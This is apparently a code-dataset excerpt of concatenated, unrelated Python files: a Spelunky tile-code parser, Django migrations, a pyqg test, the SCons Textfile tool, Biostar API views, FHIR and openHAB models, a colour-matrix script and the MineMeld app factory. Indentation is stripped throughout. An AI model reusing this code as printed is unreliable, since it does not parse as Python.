"critter_fish", # ----#
"critter_crab", # ----#
"critter_locust", # --#
"critter_penguin", # -#
"critter_firefly", # -#
"critter_drone", # ---#
"bubble_platform", # -#
"punishball", # --------#
"punishball_attach", # -#
"giant_fly", # --------#
"flying_fish", # ------#
"crabman", # ----------#
"spikeball_trap", # ---#
"spikeball_no_bounce", #
"slidingwall", # ------#
"boulder", # ----------#
"apep", # -------------#
"apep_left", # --------#
"apep_right", # -------#
"olmite_naked", # -----#
"olmite_helmet", # ----#
"olmite_armored", # ---#
]
)
NAME_PADDING = max(map(len, VALID_TILE_CODES)) + 4
PERCENT_DELIM = re.compile(r"%\d{1,2}%?")
class TileCodes:
def __init__(self):
self._inner = OrderedDict()
self.comment = None
def all(self):
return list(self._inner.values())
def get(self, name):
# TileCode.validate_name(name)
return self._inner.get(name)
def set_obj(self, obj: "TileCode"):
obj.validate()
self._inner[obj.name] = obj
def write(self, handle: TextIO):
handle.write(format_comment(self.comment))
for obj in self._inner.values():
handle.write(obj.to_line())
handle.write("\n")
@dataclass
class TileCode:
prefix: ClassVar[str] = DirectivePrefixes.TILE_CODE.value
name: str
value: str
comment: Optional[str]
@classmethod
def parse(cls, line: str) -> "TileCode":
rest, comment = split_comment(line)
directive, value = rest.split(None, 1)
name = directive[2:]
if not name:
raise ValueError("Directive missing name.")
obj = cls(name, value, comment)
obj.validate()
return obj
@staticmethod
def validate_name(name: str):
for part in PERCENT_DELIM.split(name):
# names can have foo%50 where an empty rightside is valid.
if not part:
continue
if part not in VALID_TILE_CODES:
raise ValueError(f"Name {name!r} isn't a valid tile code.")
def validate_value(self):
if len(self.value) != 1:
raise ValueError(
f"Tilecode {self.name!r} has value {self.value!r} that's more than one character."
)
def validate(self):
# self.validate_name(self.name)
self.validate_value()
def to_line(self) -> str:
return to_line(
self.prefix, self.name, NAME_PADDING, self.value, 4, self.comment
)
def write(self, handle: TextIO):
handle.write(self.to_line())
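# Illustrative round trip (the prefix comes from DirectivePrefixes.TILE_CODE, assumed
# here to be the two-character "\?" used by Spelunky 2 level files):
#   tc = TileCode.parse(TileCode.prefix + "floor 1")
#   tc.name, tc.value   # -> ("floor", "1")
#   tc.to_line()        # padded "\?floor ... 1" line ready to be written back out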
|
py | b4042ea8df4850fc877ee85f8964893b5a1de84c | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('ringapp', '0023_auto_20150121_1925'),
]
operations = [
migrations.RenameField(
model_name='ring',
old_name='reference',
new_name='old_reference',
),
migrations.AddField(
model_name='property',
name='comm_version',
field=models.ForeignKey(blank=True, to='ringapp.CommProperty', null=True, on_delete=models.CASCADE),
preserve_default=True,
),
migrations.AlterField(
model_name='ring',
name='kwds',
field=models.CharField(max_length=200, null=True, blank=True),
preserve_default=True,
),
]
|
py | b4042f421c43e22bbe1b2eeb9a71ac980bce03d5 | # Generated by Django 2.1.15 on 2020-11-27 05:24
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
py | b4042f6faa9e831e7bd640631f87e98fdc3c6538 | from __future__ import print_function
import numpy as np
import pyqg
def test_advect(rtol=1.e-13):
""" Make sure advective term vanishes for plane wave
    It is an unpleasant fact that we cannot get
    double-precision accuracy when the plane wave is
    slanted (kx != 0 and ky != 0) """
#m = bt_model.BTModel(L=2.*np.pi,nx=256)
m = pyqg.QGModel(L=2.*np.pi,nx=256,U1=0)
# there are some magic combinations that
    # fail the test... try kx=12, ky=24
# should investigate what's going on...
kx = np.array([1.,5.,10.,0.,24.,2.])
ky = np.array([2.,0.,10.,21.,12.,49.])
for i in range(kx.size):
# set plane wave PV
#m.set_q(
# np.cos( kx[i] * m.x + ky[i] * m.y ))
m.set_q1q2(
np.cos( kx[i] * m.x + ky[i] * m.y ),
np.zeros_like(m.x) )
# compute psi
m._invert()
#m.ph1,m.ph2 = m.invph(m.qh1,m.qh2)
# diagnose vel.
#m.u1,m.v1 = m.caluv(m.ph1)
# compute advection
#jacobh = m.advect(m.q[0],m.u[0],m.v[0])
jacobh = m._advect(m.q,m.u,m.v)
#jacobh = m.advect(m.q,m.u,m.v)
jacob = m.ifft(jacobh)
        # residual -- the area-averaged L1-norm of the jacobian
res = np.abs(jacob).sum()*m.dx*m.dy/(m.L**2)
print("residual = %1.5e" %res)
assert res<rtol, " *** Jacobian residual is larger than %1.1e" %rtol
if __name__ == "__main__":
test_advect()
|
py | b404301e13efbd13f7022749d684ff6f5f26971c | from functools import wraps
from flask import redirect, url_for, session
def login_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if 'credentials' not in session:
return redirect(url_for('login'))
return f(*args, **kwargs)
return decorated_function
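# Usage sketch (assumes a Flask app with a view registered under the 'login' endpoint):
#
#   @app.route('/dashboard')
#   @login_required
#   def dashboard():
#       ...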
|
py | b404304aca874b88c5e4d13c7f0ee3cdfc18787a | # -*- python -*-
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__doc__ = """
Textfile/Substfile builder for SCons.
Create file 'target' which typically is a textfile. The 'source'
may be any combination of strings, Nodes, or lists of same. A
'linesep' will be put between any part written and defaults to
os.linesep.
The only difference between the Textfile builder and the Substfile
builder is that strings are converted to Value() nodes for the
former and File() nodes for the latter. To insert files in the
former or strings in the latter, wrap them in a File() or Value(),
respectively.
The values of SUBST_DICT first have any construction variables
expanded (its keys are not expanded). If a value of SUBST_DICT is
a python callable function, it is called and the result is expanded
as the value. Values are substituted in a "random" order; if any
substitution could be further expanded by another substitution, it
is unpredictable whether the expansion will occur.
"""
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
import SCons
import os
import re
from SCons.Node import Node
from SCons.Node.Python import Value
from SCons.Util import is_String, is_Sequence, is_Dict, to_bytes
TEXTFILE_FILE_WRITE_MODE = 'w'
LINESEP = '\n'
def _do_subst(node, subs):
"""
Fetch the node contents and replace all instances of the keys with
their values. For example, if subs is
{'%VERSION%': '1.2345', '%BASE%': 'MyProg', '%prefix%': '/bin'},
then all instances of %VERSION% in the file will be replaced with
1.2345 and so forth.
"""
contents = node.get_text_contents()
if subs:
for (k, val) in subs:
contents = contents.replace(k, val)
if 'b' in TEXTFILE_FILE_WRITE_MODE:
try:
contents = bytearray(contents, 'utf-8')
except UnicodeDecodeError:
# contents is already utf-8 encoded python 2 str i.e. a byte array
contents = bytearray(contents)
return contents
def _action(target, source, env):
# prepare the line separator
linesep = env['LINESEPARATOR']
if linesep is None:
linesep = LINESEP # os.linesep
elif is_String(linesep):
pass
elif isinstance(linesep, Value):
linesep = linesep.get_text_contents()
else:
raise SCons.Errors.UserError('unexpected type/class for LINESEPARATOR: %s'
% repr(linesep), None)
if 'b' in TEXTFILE_FILE_WRITE_MODE:
linesep = to_bytes(linesep)
# create a dictionary to use for the substitutions
if 'SUBST_DICT' not in env:
subs = None # no substitutions
else:
subst_dict = env['SUBST_DICT']
if is_Dict(subst_dict):
subst_dict = list(subst_dict.items())
elif is_Sequence(subst_dict):
pass
else:
raise SCons.Errors.UserError('SUBST_DICT must be dict or sequence')
subs = []
for (k, value) in subst_dict:
if callable(value):
value = value()
if is_String(value):
value = env.subst(value)
else:
value = str(value)
subs.append((k, value))
# write the file
try:
target_file = open(target[0].get_path(), TEXTFILE_FILE_WRITE_MODE, newline='')
except (OSError, IOError):
raise SCons.Errors.UserError("Can't write target file %s" % target[0])
# separate lines by 'linesep' only if linesep is not empty
lsep = None
for line in source:
if lsep:
target_file.write(lsep)
target_file.write(_do_subst(line, subs))
lsep = linesep
target_file.close()
def _strfunc(target, source, env):
return "Creating '%s'" % target[0]
def _convert_list_R(newlist, sources):
for elem in sources:
if is_Sequence(elem):
_convert_list_R(newlist, elem)
elif isinstance(elem, Node):
newlist.append(elem)
else:
newlist.append(Value(elem))
def _convert_list(target, source, env):
if len(target) != 1:
raise SCons.Errors.UserError("Only one target file allowed")
newlist = []
_convert_list_R(newlist, source)
return target, newlist
_common_varlist = ['SUBST_DICT', 'LINESEPARATOR']
_text_varlist = _common_varlist + ['TEXTFILEPREFIX', 'TEXTFILESUFFIX']
_text_builder = SCons.Builder.Builder(
action=SCons.Action.Action(_action, _strfunc, varlist=_text_varlist),
source_factory=Value,
emitter=_convert_list,
prefix='$TEXTFILEPREFIX',
suffix='$TEXTFILESUFFIX',
)
_subst_varlist = _common_varlist + ['SUBSTFILEPREFIX', 'SUBSTFILESUFFIX']
_subst_builder = SCons.Builder.Builder(
action=SCons.Action.Action(_action, _strfunc, varlist=_subst_varlist),
source_factory=SCons.Node.FS.File,
emitter=_convert_list,
prefix='$SUBSTFILEPREFIX',
suffix='$SUBSTFILESUFFIX',
src_suffix=['.in'],
)
def generate(env):
env['LINESEPARATOR'] = LINESEP # os.linesep
env['BUILDERS']['Textfile'] = _text_builder
env['TEXTFILEPREFIX'] = ''
env['TEXTFILESUFFIX'] = '.txt'
env['BUILDERS']['Substfile'] = _subst_builder
env['SUBSTFILEPREFIX'] = ''
env['SUBSTFILESUFFIX'] = ''
def exists(env):
return 1
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
py | b40431fb330fdfc75ccdb74d5c12b943fbaee10b |
import json
import os
import logging
from os.path import join, normpath
from django.core.cache import cache
from django.conf import settings
from datetime import datetime, timedelta
from django.http import HttpResponse
from biostar.accounts.models import Profile, User
from . import util
from .models import Post, Vote, Subscription, PostView
logger = logging.getLogger("engine")
def api_error(msg="Api Error"):
return {'error': msg}
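# Helper that persists per-day statistics as JSON under settings.STATS_DIR;
# load=True reads the file for `date`, dump=True writes `data` to it.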
def stat_file(date, data=None, load=False, dump=False):
os.makedirs(settings.STATS_DIR, exist_ok=True)
file_name = f'{date.year}-{date.month}-{date.day}.json'
file_path = normpath(join(settings.STATS_DIR, file_name))
def load_file():
# This will be FileNotFoundError in Python3.
if not os.path.isfile(file_path):
raise IOError
with open(file_path, 'r') as fin:
return json.loads(fin.read())
def dump_into_file():
with open(file_path, 'w') as fout:
fout.write(json.dumps(data))
if load:
return load_file()
if dump:
return dump_into_file()
def get_counts(end):
questions = Post.objects.filter(type=Post.QUESTION, creation_date__lt=end).count()
answers = Post.objects.filter(type=Post.ANSWER, creation_date__lt=end).count()
toplevel = Post.objects.filter(type__in=Post.TOP_LEVEL, creation_date__lt=end).exclude(type=Post.BLOG).count()
comments = Post.objects.filter(type=Post.COMMENT, creation_date__lt=end).count()
votes = Vote.objects.filter(date__lt=end).count()
users = User.objects.filter(profile__date_joined__lt=end).count()
data = {
'questions': questions,
'answers': answers,
'toplevel': toplevel,
'comments': comments,
'votes': votes,
'users': users,
}
return data
def compute_stats(date):
"""
Statistics about this website for the given date.
Statistics are stored to a json file for caching purpose.
Parameters:
date -- a `datetime`.
"""
start = date.date()
end = start + timedelta(days=1)
try:
return stat_file(date=start, load=True)
except Exception as exc: # This will be FileNotFoundError in Python3.
logger.info('No stats file for {}.'.format(start))
new_users = Profile.objects.filter(date_joined__gte=start,
date_joined__lt=end).values_list("uid", flat=True)
new_posts = Post.objects.filter(creation_date__gte=start,
creation_date__lt=end).values_list("uid", flat=True)
new_votes = Vote.objects.filter(date__gte=start,
date__lt=end).values_list("uid", flat=True)
data = {
'date': util.datetime_to_iso(start),
'timestamp': util.datetime_to_unix(start),
'new_users': list(new_users),
'new_posts': list(new_posts),
'new_votes': list(new_votes),
}
data.update(get_counts(end=end))
if not settings.DEBUG:
stat_file(dump=True, date=start, data=data)
return data
def json_response(f):
"""
Converts any functions which returns a dictionary to a proper HttpResponse with json content.
"""
def to_json(request, *args, **kwargs):
"""
Creates the actual HttpResponse with json content.
"""
try:
data = f(request, *args, **kwargs)
except Exception as exc:
logger.error(exc)
data = api_error(msg=f"Error: {exc}")
payload = json.dumps(data, sort_keys=True, indent=4)
response = HttpResponse(payload, content_type="application/json")
if not data:
response.status_code = 404
response.reason_phrase = 'Not found'
return response
return to_json
@json_response
def daily_stats_on_day(request, day):
"""
Statistics about this website for the given day.
Day-0 is the day of the first post.
Parameters:
day -- a day, given as a number of days from day-0 (the day of the first post).
"""
    store = cache  # the default cache backend
day_zero = cache.get('day_zero')
first_post = Post.objects.order_by('creation_date').only('creation_date')
if day_zero is None and not first_post:
return False
if day_zero is None:
day_zero = first_post[0].creation_date
store.set('day_zero', day_zero, 60 * 60 * 24 * 7) # Cache valid for a week.
date = day_zero + timedelta(days=int(day))
# We don't provide stats for today or the future.
if not date or date.date() >= datetime.today().date():
return {}
return compute_stats(date)
@json_response
def daily_stats_on_date(request, year, month, day):
"""
Statistics about this website for the given date.
Parameters:
year -- Year, 4 digits.
month -- Month, 2 digits.
day -- Day, 2 digits.
"""
date = datetime(int(year), int(month), int(day))
# We don't provide stats for today or the future.
if date.date() >= datetime.today().date():
return {}
return compute_stats(date)
@json_response
def traffic(request):
"""
Traffic as post views in the last 60 min.
"""
now = datetime.now()
start = now - timedelta(minutes=60)
post_views = PostView.objects.filter(date__gt=start).exclude(date__gt=now).distinct('ip').count()
data = {
'date': util.datetime_to_iso(now),
'timestamp': util.datetime_to_unix(now),
'post_views_last_60_min': post_views,
}
return data
@json_response
def user_email(request, email):
user = User.objects.filter(email__iexact=email.lower())
if user.exists():
return True
return False
@json_response
def user_details(request, uid):
"""
Details for a user.
Parameters:
id -- the uid of the `User`.
"""
user = User.objects.filter(profile__uid=uid).first()
if not user:
return {}
days_ago = (datetime.now().date() - user.profile.date_joined.date()).days
data = {
'id': user.id,
'uid': user.profile.uid,
'name': user.name,
'date_joined': util.datetime_to_iso(user.profile.date_joined),
'last_login': util.datetime_to_iso(user.profile.last_login),
'joined_days_ago': days_ago,
'vote_count': Vote.objects.filter(author=user).count(),
}
return data
@json_response
def post_details(request, uid):
"""
Details for a post.
Parameters:
id -- the id of the `Post`.
"""
post = Post.objects.filter(uid=uid).first()
if not post:
return {}
return post.json_data()
@json_response
def watched_tags(request, uid):
"""
Show watched tags for a user, given API key.
Parameters:
id -- the id of the `User`.
"""
# Get the API token.
user = User.objects.filter(profile__uid=uid).first()
if user:
data = {
'id': user.id,
'uid': user.profile.uid,
'name': user.name,
'watched_tags': user.profile.watched_tags
}
else:
data = {}
return data
@json_response
def vote_details(request, id):
"""
Details for a vote.
Parameters:
id -- the id of the `Vote`.
"""
    vote = Vote.objects.filter(uid=id).first()
if not vote:
return {}
data = {
'id': vote.id,
'author_id': vote.author.id,
'author': vote.author.name,
'post_id': vote.post.id,
'type': vote.get_type_display(),
'type_id': vote.type,
'date': util.datetime_to_iso(vote.date),
}
return data |
py | b404321b38bb6283adf924638f7cfbc810fa0939 | from typing import Any, Dict, List, Optional
from pydantic import BaseModel
class OpenhabThingChannelDefinition(BaseModel):
linkedItems: Optional[List[str]]
uid: Optional[str]
id: Optional[str]
channelTypeUID: Optional[str]
itemType: Optional[str]
kind: Optional[str]
label: Optional[str]
description: Optional[str]
defaultTags: Optional[List[str]]
properties: Optional[Dict[str, Any]]
configuration: Optional[Dict[str, Any]]
class OpenhabThingDefinition(BaseModel):
label: Optional[str]
bridgeUID: Optional[str]
configuration: Dict[str, Any]
properties: Dict[str, Any]
UID: Optional[str]
thingTypeUID: Optional[str]
channels: Optional[List[OpenhabThingChannelDefinition]]
location: Optional[str]
statusInfo: Optional[Dict[str, str]]
firmwareStatus: Optional[Dict[str, str]]
editable: Optional[bool]
|
py | b404333bdfa468cc3adc1b010855966b88257c11 | from __future__ import annotations
from typing import Optional, TYPE_CHECKING
from spark_auto_mapper_fhir.fhir_types.list import FhirList
from spark_auto_mapper_fhir.fhir_types.string import FhirString
from spark_auto_mapper_fhir.extensions.extension_base import ExtensionBase
from spark_auto_mapper_fhir.base_types.fhir_backbone_element_base import (
FhirBackboneElementBase,
)
if TYPE_CHECKING:
pass
# id_ (string)
# extension (Extension)
# modifierExtension (Extension)
# code (generic_type)
from spark_auto_mapper_fhir.value_sets.generic_type import GenericTypeCode
# op (generic_type)
# This file is auto-generated by generate_classes so do not edit manually
# noinspection PyPep8Naming
class TerminologyCapabilitiesFilter(FhirBackboneElementBase):
"""
TerminologyCapabilities.Filter
A TerminologyCapabilities resource documents a set of capabilities (behaviors) of a FHIR Terminology Server that may be used as a statement of actual server functionality or a statement of required or desired server implementation.
"""
# noinspection PyPep8Naming
def __init__(
self,
*,
id_: Optional[FhirString] = None,
extension: Optional[FhirList[ExtensionBase]] = None,
modifierExtension: Optional[FhirList[ExtensionBase]] = None,
code: GenericTypeCode,
op: FhirList[GenericTypeCode],
) -> None:
"""
A TerminologyCapabilities resource documents a set of capabilities (behaviors)
of a FHIR Terminology Server that may be used as a statement of actual server
functionality or a statement of required or desired server implementation.
:param id_: None
:param extension: May be used to represent additional information that is not part of the basic
definition of the element. To make the use of extensions safe and manageable,
there is a strict set of governance applied to the definition and use of
extensions. Though any implementer can define an extension, there is a set of
requirements that SHALL be met as part of the definition of the extension.
:param modifierExtension: May be used to represent additional information that is not part of the basic
definition of the element and that modifies the understanding of the element
in which it is contained and/or the understanding of the containing element's
descendants. Usually modifier elements provide negation or qualification. To
make the use of extensions safe and manageable, there is a strict set of
governance applied to the definition and use of extensions. Though any
implementer can define an extension, there is a set of requirements that SHALL
be met as part of the definition of the extension. Applications processing a
resource are required to check for modifier extensions.
Modifier extensions SHALL NOT change the meaning of any elements on Resource
or DomainResource (including cannot change the meaning of modifierExtension
itself).
:param code: Code of the property supported.
:param op: Operations supported for the property.
"""
super().__init__(
id_=id_,
extension=extension,
modifierExtension=modifierExtension,
code=code,
op=op,
)
|
py | b404348129e3cb1c260af2ef30f768f5c8858079 | #!/usr/bin/env python
# Copyright (c) 2016, Blake G. Sloan
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1.Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2.Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
This is a command-line utility for generating 3x3 matrices to transform linear
RGB values from each eye of a Dolby Stereo 3D projector to P3 color space.
Measurements of CIE xy chromaticity pairs for R,G,B and W for each eye are
provided through a json file (see test/measurements.json).
Resulting matrices are printed to the terminal output and can optionally be
written to their own json file.
"""
import os
import sys
import numpy as np
import json
import math
from optparse import OptionParser
def parse_cmdline():
parser = OptionParser()
parser.add_option("-i", "--input", dest="infname",
help="Read left and right primaries and white point from json file")
parser.add_option("-o", "--output", dest="outfname",
help="Write left and right compensation matrices to json file")
parser.add_option("-t", "--test", dest="test", action="store_false",
help="Use dummy left/right primaries to test the program")
return parser.parse_args()
def promote_xyz(a):
"""
Add a 'z' coordinate to each xy pair
"""
for p in a:
p.append(1.0-p[0]-p[1])
return a
def xyz_to_XYZ(v):
"""
convert xyz to XYZ
"""
V = [(1.0/v[1])*v[0], 1.0,(1.0/v[1])*v[2]]
#print "XYZ val:",V
return V
def primaries_to_XYZ(b):
"""
Linear algebra bit.
Reference: http://www.ryanjuckett.com/programming/rgb-color-space-conversion/
"""
c = b[0:3]
bb = np.matrix(c)
d = bb.T.I
w = np.matrix(xyz_to_XYZ(b[3])).transpose()
v = d*w
diag_w = np.diagflat(v)
return bb.T * diag_w
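# Returns the largest row sum of the 3x3 matrix, used below to normalize each eye's
# matrix (presumably so that no output channel can exceed 1.0 for in-gamut input).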
def compute_norm(mat):
m = mat.tolist()
a = m[0][0]+m[0][1]+m[0][2]
b = m[1][0]+m[1][1]+m[1][2]
c = m[2][0]+m[2][1]+m[2][2]
if a > b:
if a > c:
return a
else:
return c
else:
return b
def a_to_b(a, b):
"""
Make a colorspace conversion matrix between two sets of primaries.
"""
a_to_xyz = primaries_to_XYZ(a)
#print "ToXYZ:",a_to_xyz
b_to_xyz = primaries_to_XYZ(b)
return a_to_xyz.I * b_to_xyz
if __name__ in "__main__":
# To test the program, run with --test
test_dcip3_rgbw = [[0.68, 0.32], [0.265, 0.69], [0.15,0.06], [0.314, 0.351]]
test_left_rgbw = [[0.62, 0.34], [0.31, 0.54], [0.18,0.07], [0.3201, 0.314]]
test_right_rgbw = [[0.65, 0.32], [0.29, 0.61], [0.17,0.04], [0.3100, 0.332]]
options,args = parse_cmdline()
    if options.infname:
handle = open(options.infname, 'r')
data = json.load(handle)
handle.close()
test_left_rgbw = data['left_primaries_and_wp']
test_right_rgbw = data['right_primaries_and_wp']
# Let's add the 'z' component
left = promote_xyz(test_left_rgbw)
right = promote_xyz(test_right_rgbw)
p3 = promote_xyz(test_dcip3_rgbw)
print "left\n",np.matrix(left)
print "right\n",np.matrix(right)
print "DCI-P3\n",np.matrix(p3)
left_to_p3 = a_to_b(test_left_rgbw, p3)
right_to_p3 = a_to_b(test_right_rgbw, p3)
left_norm = compute_norm(left_to_p3)
right_norm = compute_norm(right_to_p3)
left_to_p3 = left_to_p3 / left_norm
right_to_p3 = right_to_p3 / right_norm
print "left_to_p3"
print left_to_p3
print "right_to_p3"
print right_to_p3
    if options.outfname:
handle = open(options.outfname, 'w')
handle.write(json.dumps({'left':(left_to_p3).tolist(), 'right':(right_to_p3).tolist()}))
handle.close()
|
py | b40434abd33233499625e19e882556536928b356 | # Copyright 2015 Palo Alto Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
import yaml
from flask import Flask
import minemeld.loader
from .logger import LOG
REDIS_URL = os.environ.get('REDIS_URL', 'unix:///var/run/redis/redis.sock')
def create_app():
yaml.SafeLoader.add_constructor(
u'tag:yaml.org,2002:timestamp',
yaml.SafeLoader.construct_yaml_str
)
app = Flask(__name__)
app.config['MAX_CONTENT_LENGTH'] = 5 * 1024 * 1024 # max 5MB for uploads
LOG.init_app(app)
# extension code
from . import config
from . import aaa
from . import session
from . import mmrpc
from . import redisclient
from . import supervisorclient
from . import jobs
from . import sns
from . import events
session.init_app(app, REDIS_URL)
aaa.init_app(app)
config.init()
if config.get('DEBUG', False):
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
mmrpc.init_app(app)
redisclient.init_app(app)
supervisorclient.init_app(app)
jobs.init_app(app)
sns.init_app()
events.init_app(app, REDIS_URL)
# entrypoints
from . import metricsapi # noqa
from . import feedredis # noqa
from . import configapi # noqa
from . import configdataapi # noqa
from . import taxiidiscovery # noqa
from . import taxiicollmgmt # noqa
from . import taxiipoll # noqa
from . import supervisorapi # noqa
from . import loginapi # noqa
from . import prototypeapi # noqa
from . import validateapi # noqa
from . import aaaapi # noqa
from . import statusapi # noqa
from . import tracedapi # noqa
from . import logsapi # noqa
from . import extensionsapi # noqa
from . import jobsapi # noqa
configapi.init_app(app)
extensionsapi.init_app(app)
app.register_blueprint(metricsapi.BLUEPRINT)
app.register_blueprint(statusapi.BLUEPRINT)
app.register_blueprint(feedredis.BLUEPRINT)
app.register_blueprint(configapi.BLUEPRINT)
app.register_blueprint(configdataapi.BLUEPRINT)
app.register_blueprint(taxiidiscovery.BLUEPRINT)
app.register_blueprint(taxiicollmgmt.BLUEPRINT)
app.register_blueprint(taxiipoll.BLUEPRINT)
app.register_blueprint(supervisorapi.BLUEPRINT)
app.register_blueprint(loginapi.BLUEPRINT)
app.register_blueprint(prototypeapi.BLUEPRINT)
app.register_blueprint(validateapi.BLUEPRINT)
app.register_blueprint(aaaapi.BLUEPRINT)
app.register_blueprint(tracedapi.BLUEPRINT)
app.register_blueprint(logsapi.BLUEPRINT)
app.register_blueprint(extensionsapi.BLUEPRINT)
app.register_blueprint(jobsapi.BLUEPRINT)
# install blueprints from extensions
for apiname, apimmep in minemeld.loader.map(minemeld.loader.MM_API_ENTRYPOINT).iteritems():
LOG.info('Loading blueprint from {}'.format(apiname))
if not apimmep.loadable:
LOG.info('API entrypoint {} not loadable, ignored'.format(apiname))
continue
try:
bprint = apimmep.ep.load()
app.register_blueprint(bprint)
except (ImportError, RuntimeError):
LOG.exception('Error loading API entry point {}'.format(apiname))
# install webui blueprints from extensions
for webuiname, webuimmep in minemeld.loader.map(minemeld.loader.MM_WEBUI_ENTRYPOINT).iteritems():
LOG.info('Loading blueprint from {}'.format(webuiname))
if not webuimmep.loadable:
LOG.info('API entrypoint {} not loadable, ignored'.format(webuiname))
continue
try:
bprint = webuimmep.ep.load()
app.register_blueprint(
bprint(),
url_prefix='/extensions/webui/{}'.format(webuiname)
)
except (ImportError, RuntimeError):
LOG.exception('Error loading WebUI entry point {}'.format(webuiname))
for r in app.url_map.iter_rules():
LOG.debug('app rule: {!r}'.format(r))
return app
|
py | b404355fc05e6784c593b10906db5931f384f33d | # -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2019-11-25 11:18
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('projects', '0044_auto_20190703_1300'),
('docsitalia', '0018_create_allowed_tags'),
]
operations = [
migrations.CreateModel(
name='ProjectOrder',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('priority', models.PositiveIntegerField(default=0, help_text='Greater number goes first in Project list')),
('project', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='projects.Project', verbose_name='Projects')),
],
options={
'verbose_name': 'project order',
'verbose_name_plural': 'projects order',
'ordering': ('-priority',),
},
),
]
|
py | b404368aea56e2fe2dffb250d4ed1a534e5f0999 | import argparse
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
SAC = {
"Hopper-v2": [
"extra/multistep/SAC_online_n_1_Hopper-v2_1_20210907092100/evaluation.csv",
"extra/multistep/SAC_online_n_1_Hopper-v2_2_20210907121407/evaluation.csv",
"extra/multistep/SAC_online_n_1_Hopper-v2_3_20210907150406/evaluation.csv",
],
"HalfCheetah-v2": [
"extra/multistep/SAC_online_n_1_HalfCheetah-v2_1_20210907175459/evaluation.csv",
"extra/multistep/SAC_online_n_1_HalfCheetah-v2_2_20210907204725/evaluation.csv",
"extra/multistep/SAC_online_n_1_HalfCheetah-v2_3_20210907233759/evaluation.csv",
],
"Walker2d-v2": [
"extra/multistep/SAC_online_n_1_Walker2d-v2_1_20210908022849/evaluation.csv",
"extra/multistep/SAC_online_n_1_Walker2d-v2_2_20210908052149/evaluation.csv",
"extra/multistep/SAC_online_n_1_Walker2d-v2_3_20210908081437/evaluation.csv",
],
"HopperBulletEnv-v0": [
"extra/multistep/SAC_online_n_1_HopperBulletEnv-v0_1_20210913021439/evaluation.csv",
"extra/multistep/SAC_online_n_1_HopperBulletEnv-v0_2_20210913065751/evaluation.csv",
"extra/multistep/SAC_online_n_1_HopperBulletEnv-v0_3_20210913114051/evaluation.csv",
],
"HalfCheetahBulletEnv-v0": [
"extra/multistep/SAC_online_n_1_HalfCheetahBulletEnv-v0_1_20210912112616/evaluation.csv",
"extra/multistep/SAC_online_n_1_HalfCheetahBulletEnv-v0_2_20210912162156/evaluation.csv",
"extra/multistep/SAC_online_n_1_HalfCheetahBulletEnv-v0_3_20210912211840/evaluation.csv",
],
